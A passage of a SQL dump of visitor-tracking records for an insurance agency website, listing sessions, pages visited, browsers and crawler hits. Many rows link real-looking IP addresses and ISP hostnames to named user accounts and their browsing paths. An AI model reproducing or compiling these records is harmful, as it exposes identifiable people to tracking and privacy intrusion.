(KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','51',0),(13803,'0b_9de195837518203ec90053bd62717258','1459957107','104.48.182.222','104-48-182-222.lightspeed.hstntx.sbcglobal.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','','',0,'Win10','Google Chrome','','','','','','','','0','0',0),(13805,'0b_9de195837518203ec90053bd62717258','1459957107','104.48.182.222','104-48-182-222.lightspeed.hstntx.sbcglobal.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','','',0,'Win10','Google Chrome','','','','','','','','0','0',0),(13806,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459957285','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13809,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459957289','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13811,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459957294','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13814,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459957911','24.146.252.22','ool-1892fc16.dyn.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13817,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459957911','24.146.252.22','ool-1892fc16.dyn.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13818,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459957912','24.146.252.22','ool-1892fc16.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','0',0),(13820,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459957924','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13821,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459957933','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13824,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459958433','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13827,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459958440','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13830,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459958943','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(13833,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459958950','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13835,'0b_a6260b0163d885390463c07ad0839698','1459959588','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13836,'0b_a6260b0163d885390463c07ad0839698','1459959590','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13838,'0b_a6260b0163d885390463c07ad0839698','1459959598','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13839,'0b_a6260b0163d885390463c07ad0839698','1459959600','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13841,'0b_a6260b0163d885390463c07ad0839698','1459959603','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13842,'0b_a6260b0163d885390463c07ad0839698','1459959605','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13845,'0b_a6260b0163d885390463c07ad0839698','1459959608','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13847,'0b_a6260b0163d885390463c07ad0839698','1459959610','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13850,'0b_a6260b0163d885390463c07ad0839698','1459959613','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13851,'0b_a6260b0163d885390463c07ad0839698','1459959616','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13854,'0b_a6260b0163d885390463c07ad0839698','1459959681','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13856,'0b_a6260b0163d885390463c07ad0839698','1459959681','47.16.234.156','ool-2f10ea9c.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(13859,'0b_827b8ae85acba4057e880b4db0b843f7','1459960456','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(13860,'0b_827b8ae85acba4057e880b4db0b843f7','1459960468','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(13863,'0b_827b8ae85acba4057e880b4db0b843f7','1459960481','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(13866,'0b_827b8ae85acba4057e880b4db0b843f7','1459960503','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(13869,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459960651','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13871,'0b_9b0ce41504cd9219d7acdcd8fcc07279','1459960666','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(13872,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459960833','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13874,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961239','24.146.252.22','ool-1892fc16.dyn.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13877,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961240','24.146.252.22','ool-1892fc16.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','0',0),(13878,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961248','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13881,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961287','24.146.252.22','ool-1892fc16.dyn.optonline.net','/wp-admin/profile.php','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/wp-login.php?loggedout=true','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','0',0),(13883,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961310','24.146.252.22','ool-1892fc16.dyn.optonline.net','/wp-admin/index.php','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/wp-admin/profile.php','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','0',0),(13886,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961314','24.146.252.22','ool-1892fc16.dyn.optonline.net','/wp-admin/admin-ajax.php?action=dashboard-widgets&widget=dashboard_primary&pagenow=dashboard','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/wp-admin/index.php','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','0',0),(13887,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961315','24.146.252.22','ool-1892fc16.dyn.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/wp-admin/index.php','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13890,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961316','24.146.252.22','ool-1892fc16.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','0',0),(13893,'0b_d23d00c0c993bbb82a4100d04ee125b1','1459961320','24.146.252.22','ool-1892fc16.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1344 x 840','','','','hglanzer','','0','51',0),(13895,'0b_1aaabbf91df4c86d632029db0f38653c','1459961869','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','0',0),(13896,'0b_1aaabbf91df4c86d632029db0f38653c','1459961872','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','0',0),(13898,'0b_1aaabbf91df4c86d632029db0f38653c','1459961880','104.246.54.244','ool-68f636f4.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','0',0),(13899,'0b_1aaabbf91df4c86d632029db0f38653c','1459961927','104.246.54.244','ool-68f636f4.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(13902,'0b_1aaabbf91df4c86d632029db0f38653c','1459962005','104.246.54.244','ool-68f636f4.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(13905,'0b_1aaabbf91df4c86d632029db0f38653c','1459962011','104.246.54.244','ool-68f636f4.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(13908,'0b_f41cbf6fa862fce58e29917f6ff786c0','1459962254','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13910,'0b_d07e3df3e225e09b0ae4fa0106616463','1459964224','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(13913,'0b_d07e3df3e225e09b0ae4fa0106616463','1459964226','141.8.143.242','spider-141-8-143-242.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(13916,'0b_c2aad76d3d48c48fe6f749328ed39049','1459965999','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(13919,'0b_131e5e66a75ffb6103073e74f48f38c3','1459966218','104.246.54.244','ool-68f636f4.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','0',0),(13920,'0b_131e5e66a75ffb6103073e74f48f38c3','1459966226','104.246.54.244','ool-68f636f4.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(13922,'0b_1bb8a452bb76eb68c07e4babdaa21224','1459967424','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13923,'0b_1bb8a452bb76eb68c07e4babdaa21224','1459967424','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13925,'0b_1bb8a452bb76eb68c07e4babdaa21224','1459967426','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13928,'0b_1bb8a452bb76eb68c07e4babdaa21224','1459967429','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(13929,'0b_1bb8a452bb76eb68c07e4babdaa21224','1459967442','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(13931,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459967838','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empireins&src=IE-TopResult&FORM=IETR02&conversationid=','empireins',1,'Win8 x64','IE 11','us','1920 x 1080','Bing','','','','','0','0',0),(13932,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459967842','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(13934,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459967847','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(13937,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459967879','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(13940,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459967902','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','51',0),(13943,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459968017','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','51',0),(13944,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459968223','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','51',0),(13946,'0b_0d30701b33f9995855356a0ed3d1eb1c','1459968231','209.140.37.243','ool-d18c25f3.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(13947,'0b_e3c83caa2bb9404f3d62fe4752b50330','1459969419','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13949,'0b_e3c83caa2bb9404f3d62fe4752b50330','1459969421','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13952,'0b_24b89d93428b65b88f3b1a4c95472b13','1459969428','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(13955,'0b_24b89d93428b65b88f3b1a4c95472b13','1459969429','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(13956,'0b_24b89d93428b65b88f3b1a4c95472b13','1459969801','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(13959,'0b_24b89d93428b65b88f3b1a4c95472b13','1459969802','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(13962,'0b_24b89d93428b65b88f3b1a4c95472b13','1459970554','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(13964,'0b_73c855c5c6168fef7047f293ef429474','1459970599','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13965,'0b_73c855c5c6168fef7047f293ef429474','1459970601','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(13968,'0b_3df73aa07360259fdad2cc7fa3826543','1459970764','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(13970,'0b_3df73aa07360259fdad2cc7fa3826543','1459970765','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(13973,'0b_3df73aa07360259fdad2cc7fa3826543','1459970769','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','51',0),(13976,'0b_6c23cd4e24353cbbd9e00cb21251f308','1459970972','24.146.252.22','ool-1892fc16.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(13977,'0b_6c23cd4e24353cbbd9e00cb21251f308','1459970974','24.146.252.22','ool-1892fc16.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(13980,'0b_7aca8603233de3a2d5189325484c6ca7','1459971326','67.86.223.95','ool-4356df5f.dyn.optonline.net','/','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','http://www.yellowpages.com/search?search_terms=commercial%20insurance%20agencies&geo_location_terms=Queens%2C%20NY&page=8','',0,'iPad','Safari 9 Mobile','us','','','','','','','0','0',0),(13983,'0b_7aca8603233de3a2d5189325484c6ca7','1459971329','67.86.223.95','ool-4356df5f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','','','','','','','0','0',0),(13986,'0b_93969602f56b44a75b49564430cfc067','1459971933','66.249.83.144,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google 